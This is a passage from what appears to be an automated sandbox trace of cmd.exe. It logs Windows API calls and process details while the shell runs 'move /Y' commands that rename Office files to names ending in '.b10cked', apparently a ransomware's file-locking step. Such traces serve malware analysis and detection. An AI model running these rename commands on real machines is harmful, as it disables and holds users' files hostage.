(_String1="KEYS", _String2="RANDOM") returned -7 [0157.075] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0157.075] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f898 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.075] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f898, lpFilePart=0x16f894 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f894*="Desktop") returned 0x18 [0157.075] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0157.075] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f614 | out: lpFindFileData=0x16f614) returned 0x2809f8 [0157.075] FindClose (in: hFindFile=0x2809f8 | out: hFindFile=0x2809f8) returned 1 [0157.075] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f614 | out: lpFindFileData=0x16f614) returned 0x2809f8 [0157.075] FindClose (in: hFindFile=0x2809f8 | out: hFindFile=0x2809f8) returned 1 [0157.075] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f614 | out: lpFindFileData=0x16f614) returned 0x2809f8 [0157.075] FindClose (in: hFindFile=0x2809f8 | out: hFindFile=0x2809f8) returned 1 [0157.076] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0157.076] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0157.076] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0157.076] GetEnvironmentStringsW () returned 0x280218* [0157.076] FreeEnvironmentStringsW (penv=0x280218) returned 1 [0157.076] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.076] GetConsoleOutputCP () returned 0x1b5 [0157.076] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0157.076] GetUserDefaultLCID () returned 0x409 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f9d8, cchData=128 | out: lpLCData="0") returned 2 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f9d8, cchData=128 | out: lpLCData="0") returned 2 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f9d8, cchData=128 | out: lpLCData="1") returned 2 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0157.077] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0157.077] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0157.078] GetConsoleTitleW (in: lpConsoleTitle=0x270938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0157.123] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0157.123] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0157.123] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0157.123] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0157.124] _wcsicmp (_String1="move", _String2=")") returned 68 [0157.124] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0157.124] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0157.124] _wcsicmp (_String1="IF", _String2="move") returned -4 [0157.124] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0157.124] _wcsicmp (_String1="REM", _String2="move") returned 5 [0157.124] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0157.128] GetConsoleTitleW (in: lpConsoleTitle=0x16f6d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0157.128] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0157.128] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0157.128] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0157.128] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0157.128] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0157.128] _wcsicmp (_String1="move", _String2="CD") returned 10 [0157.128] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0157.128] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0157.128] _wcsicmp (_String1="move", _String2="REN") returned -5 [0157.128] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0157.129] _wcsicmp (_String1="move", _String2="SET") returned -6 [0157.129] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0157.129] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0157.129] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0157.129] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0157.129] _wcsicmp (_String1="move", _String2="MD") returned 11 [0157.129] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0157.129] _wcsicmp (_String1="move", _String2="RD") returned -5 [0157.129] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0157.129] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0157.129] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0157.129] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0157.129] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0157.129] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0157.129] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0157.129] _wcsicmp (_String1="move", _String2="VER") returned -9 [0157.129] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0157.129] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0157.129] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0157.129] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0157.129] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0157.129] _wcsicmp (_String1="move", _String2="START") returned -6 [0157.129] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0157.129] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0157.129] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0157.131] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0157.131] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0157.131] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f48c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f484, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f484*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0157.132] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0157.133] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0157.133] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0157.133] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0157.133] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0157.133] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0157.133] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0157.133] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0157.133] _wcsicmp (_String1="OUTLLI~2.TRX", _String2=".") returned 65 [0157.133] _wcsicmp (_String1="OUTLLI~2.TRX", _String2="..") returned 65 [0157.133] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outlli~2.trx")) returned 0x2020 [0157.399] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x281f28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.399] SetErrorMode (uMode=0x0) returned 0x0 [0157.399] SetErrorMode (uMode=0x1) returned 0x0 [0157.399] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX", nBufferLength=0x104, lpBuffer=0x16ee14, lpFilePart=0x16edfc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX", lpFilePart=0x16edfc*="OUTLLI~2.TRX") returned 0x3c [0157.399] SetErrorMode (uMode=0x0) returned 0x1 [0157.399] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0157.399] _wcsicmp (_String1="OUTLLI~2.TRX", _String2=".") returned 65 [0157.399] _wcsicmp (_String1="OUTLLI~2.TRX", _String2="..") returned 65 [0157.399] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outlli~2.trx")) returned 0x2020 [0157.399] SetErrorMode (uMode=0x0) returned 0x0 [0157.399] SetErrorMode (uMode=0x1) returned 0x0 [0157.399] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX", nBufferLength=0x104, lpBuffer=0x16f290, lpFilePart=0x16f028 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX", lpFilePart=0x16f028*="OUTLLI~2.TRX") returned 0x3c [0157.399] SetErrorMode (uMode=0x0) returned 0x1 [0157.399] SetErrorMode (uMode=0x0) returned 0x0 [0157.400] SetErrorMode (uMode=0x1) returned 0x0 [0157.400] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x16f498, lpFilePart=0x16f028 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll.b10cked", lpFilePart=0x16f028*="OUTLLIBR.REST.trx_dll.b10cked") returned 0x4d [0157.400] SetErrorMode (uMode=0x0) returned 0x1 [0157.400] SetLastError (dwErrCode=0x0) [0157.400] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outllibr.rest.trx_dll.b10cked")) returned 0xffffffff [0157.400] GetLastError () returned 0x2 [0157.400] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x16e9a4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e9a4) returned 0x282138 [0157.400] FindNextFileW (in: hFindFile=0x282138, lpFindFileData=0x16e9a4 | out: lpFindFileData=0x16e9a4) returned 0 [0157.400] GetLastError () returned 0x12 [0157.400] FindClose (in: hFindFile=0x282138 | out: hFindFile=0x282138) returned 1 [0157.402] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x281cc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x281cc8) returned 0x282138 [0157.402] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x16ec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4d [0157.402] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x16ec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll", lpFilePart=0x0) returned 0x45 [0157.402] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outllibr.rest.trx_dll")) returned 0x2020 [0157.402] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outllibr.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outllibr.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0157.402] FindClose (in: hFindFile=0x282138 | out: hFindFile=0x282138) returned 1 [0157.403] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16ebf0 | out: _Buffer=" 1") returned 9 [0157.403] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.403] GetFileType (hFile=0x7) returned 0x2 [0157.403] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0157.403] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16eb7c | out: lpMode=0x16eb7c) returned 1 [0157.403] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.403] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ebb0 | out: lpConsoleScreenBufferInfo=0x16ebb0) returned 1 [0157.403] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0157.403] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16ebf0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0157.404] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16ebd4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16ebd4*=0x1a) returned 1 [0157.404] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.404] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0157.404] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.404] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0157.404] _get_osfhandle (_FileHandle=0) returned 0x3 [0157.404] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0157.404] SetConsoleInputExeNameW () returned 0x1 [0157.404] GetConsoleOutputCP () returned 0x1b5 [0157.404] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0157.404] SetThreadUILanguage (LangId=0x0) returned 0x409 [0157.405] exit (_Code=0) Process: id = "262" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0xd8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21625 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21626 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21627 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21628 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 21629 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21630 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21631 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21632 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21633 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 21634 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21659 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21660 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21661 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21662 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 21663 start_va = 0x420000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 21664 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21665 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21666 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21667 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21668 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21669 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21670 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21671 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21672 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21673 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 21674 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21675 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21676 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 21677 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 21678 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 21679 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 21680 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 21681 start_va = 0x630000 end_va = 0x122ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 21682 start_va = 0x1230000 end_va = 0x1392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001230000" filename = "" Thread: id = 325 os_tid = 0x3dc [0157.101] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af894 | out: lpSystemTimeAsFileTime=0x2af894*(dwLowDateTime=0x9793ede0, dwHighDateTime=0x1d440a9)) [0157.101] GetCurrentProcessId () returned 0xd8c [0157.101] GetCurrentThreadId () returned 0x3dc [0157.101] GetTickCount () returned 0x3029e [0157.101] QueryPerformanceCounter (in: lpPerformanceCount=0x2af88c | out: lpPerformanceCount=0x2af88c*=21389041055) returned 1 [0157.102] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0157.102] __set_app_type (_Type=0x1) [0157.102] __p__fmode () returned 0x76b331f4 [0157.102] __p__commode () returned 0x76b331fc [0157.102] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0157.102] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0157.102] GetCurrentThreadId () returned 0x3dc [0157.102] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x3dc) returned 0x38 [0157.102] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0157.102] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0157.102] SetThreadUILanguage (LangId=0x0) returned 0x409 [0157.103] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 